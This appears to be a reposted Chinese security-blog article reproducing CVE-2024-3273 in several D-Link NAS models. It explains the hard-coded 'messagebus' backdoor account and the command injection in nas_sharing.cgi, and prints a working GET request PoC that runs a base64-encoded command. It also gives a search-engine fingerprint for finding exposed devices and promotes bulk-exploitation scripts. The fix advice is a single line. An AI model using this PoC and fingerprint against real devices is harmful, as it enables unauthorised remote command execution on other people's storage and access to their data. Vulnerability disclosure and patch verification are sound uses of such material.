漏洞复现-D-Link 设备存在后门账号(CVE-2024-3273)

admin
admin
admin
138635
文章
114
评论
2024年4月19日23:26:04评论133 views字数 1103阅读3分40秒阅读模式
免责声明

文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。如有侵权烦请告知,我会立即删除并致歉。谢谢!

:漏洞名称

D-Link NAS设备未授权RCE漏

:漏洞描述

D-Link DNS-320是一款功能丰富的网络存储设备,具有双硬盘插槽、RAID支持、网络存储、文件共享、数据备份等特点,适用于家庭和小型办公室环境,提供便捷的数据存储和共享解决方案。
D-Link NAS nas_sharing.cgi接口存在命令执行漏洞,该漏洞存在于“/cgi-bin/nas_sharing.cgi”脚本中,影响其 HTTP GET 请求处理程序组件。导致该漏洞的两个主要问题是通过硬编码帐户(用户名:“messagebus”和空密码)造成的后门以及通过“system”参数的命令注入问题。

漏洞影响版本

DNS-320L Version 1.11Version 1.03.0904.2013Version 1.01.0702.2013DNS-325 Version 1.01DNS-327L Version 1.09Version 1.00.0409.2013DNS-340L Version 1.08

:网络空间测绘查询

body="Text:In order to access the ShareCenter"
漏洞复现-D-Link 设备存在后门账号(CVE-2024-3273)
漏洞复现-D-Link 设备存在后门账号(CVE-2024-3273)

:漏洞复现

POC:
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.55Connection: closeAccept: */*Accept-Encoding: gzip
PHP 中,传入代码执行或命令执行等危险函数的参数,客户端可控,同时针对该参数没有做过滤或过滤不足,导致代码执行或命令执行。通过远程访问方式传参,就叫做RCE。
漏洞复现-D-Link 设备存在后门账号(CVE-2024-3273)
:批量检测
漏洞复现-D-Link 设备存在后门账号(CVE-2024-3273)
:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。
关注【Adler学安全】公众号
发送【0410】获取批量验证脚本
发送【工具】获取渗透测试工具
发送【交流群1】加入交流群
漏洞复现-D-Link 设备存在后门账号(CVE-2024-3273)

原文始发于微信公众号(Adler学安全):漏洞复现-D-Link 设备存在后门账号(CVE-2024-3273)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月19日23:26:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-D-Link 设备存在后门账号(CVE-2024-3273)http://cn-sec.com/archives/2645743.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息